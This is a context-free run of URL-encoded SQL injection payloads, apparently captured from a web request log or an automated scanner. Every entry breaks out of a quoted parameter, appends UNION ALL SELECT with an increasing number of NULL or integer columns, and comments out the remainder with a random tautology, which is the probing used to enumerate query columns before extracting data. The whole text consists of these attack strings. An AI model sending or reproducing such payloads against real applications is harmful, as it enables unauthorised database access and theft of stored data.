foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22VPRF%22%3D%22VPRF foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22odwx%22%3D%22odwx -7475%22%20UNION%20ALL%20SELECT%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921--%20%20AND%20%22ipug%22%3D%22ipug -8821%22%20UNION%20ALL%20SELECT%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411--%20%20AND%20%22YWJU%22%3D%22YWJU -2648%22%20UNION%20ALL%20SELECT%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397--%20%20AND%20%22fYlu%22%3D%22fYlu -7338%22%20UNION%20ALL%20SELECT%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822%2C%209822--%20%20AND%20%22qflu%22%3D%22qflu -1063%22%20UNION%20ALL%20SELECT%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463%2C%206463--%20%20AND%20%22uCCB%22%3D%22uCCB -3912%22%20UNION%20ALL%20SELECT%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155%2C%202155--%20%20AND%20%22KyRT%22%3D%22KyRT -7182%22%20UNION%20ALL%20SELECT%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311%2C%203311--%20%20AND%20%22bNTN%22%3D%22bNTN -8127%22%20UNION%20ALL%20SELECT%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058%2C%202058--%20%20AND%20%22OPie%22%3D%22OPie -8032%22%20UNION%20ALL%20SELECT%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874%2C%206874--%20%20AND%20%22NFoX%22%3D%22NFoX -8176%22%20UNION%20ALL%20SELECT%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371%2C%202371--%20%20AND%20%22EgLq%22%3D%22EgLq foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22URBN%22%3D%22URBN foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22hasm%22%3D%22hasm foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22rSUG%22%3D%22rSUG foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22hYAR%22%3D%22hYAR foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Fmag%22%3D%22Fmag foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22UsbV%22%3D%22UsbV foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22becA%22%3D%22becA foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22tQFk%22%3D%22tQFk foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22GaCq%22%3D%22GaCq foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22XlzY%22%3D%22XlzY -4047%22%20UNION%20ALL%20SELECT%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670--%20%20AND%20%22MezK%22%3D%22MezK -6031%22%20UNION%20ALL%20SELECT%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703--%20%20AND%20%22SmDS%22%3D%22SmDS -8568%22%20UNION%20ALL%20SELECT%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038--%20%20AND%20%22mDhg%22%3D%22mDhg -8817%22%20UNION%20ALL%20SELECT%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294--%20%20AND%20%22cFBt%22%3D%22cFBt -2254%22%20UNION%20ALL%20SELECT%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368--%20%20AND%20%22DxnB%22%3D%22DxnB -8843%22%20UNION%20ALL%20SELECT%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772%2C%205772--%20%20AND%20%22mhud%22%3D%22mhud -6229%22%20UNION%20ALL%20SELECT%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136--%20%20AND%20%22RUxk%22%3D%22RUxk -9320%22%20UNION%20ALL%20SELECT%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107--%20%20AND%20%22bqyf%22%3D%22bqyf -3331%22%20UNION%20ALL%20SELECT%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273--%20%20AND%20%22zOyN%22%3D%22zOyN -7533%22%20UNION%20ALL%20SELECT%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401--%20%20AND%20%22KnJJ%22%3D%22KnJJ foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Ywpk%22%3D%22Ywpk foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22nPOd%22%3D%22nPOd foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Bihv%22%3D%22Bihv foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22dIAY%22%3D%22dIAY foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22IIeB%22%3D%22IIeB foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22wIez%22%3D%22wIez foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22KIgy%22%3D%22KIgy foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22PUAO%22%3D%22PUAO foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22oaMC%22%3D%22oaMC foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22vFkz%22%3D%22vFkz -1863%22%20UNION%20ALL%20SELECT%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751%2C%207751--%20%20AND%20%22JhOe%22%3D%22JhOe -7518%22%20UNION%20ALL%20SELECT%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499%2C%202499--%20%20AND%20%22xRyG%22%3D%22xRyG -2824%22%20UNION%20ALL%20SELECT%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963%2C%203963--%20%20AND%20%22Sobw%22%3D%22Sobw -6944%22%20UNION%20ALL%20SELECT%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045--%20%20AND%20%22fHVv%22%3D%22fHVv -9020%22%20UNION%20ALL%20SELECT%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693--%20%20AND%20%22MBWX%22%3D%22MBWX -7660%22%20UNION%20ALL%20SELECT%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063--%20%20AND%20%22JlFf%22%3D%22JlFf -4565%22%20UNION%20ALL%20SELECT%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800--%20%20AND%20%22Ulxe%22%3D%22Ulxe -3231%22%20UNION%20ALL%20SELECT%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389--%20%20AND%20%22CROy%22%3D%22CROy 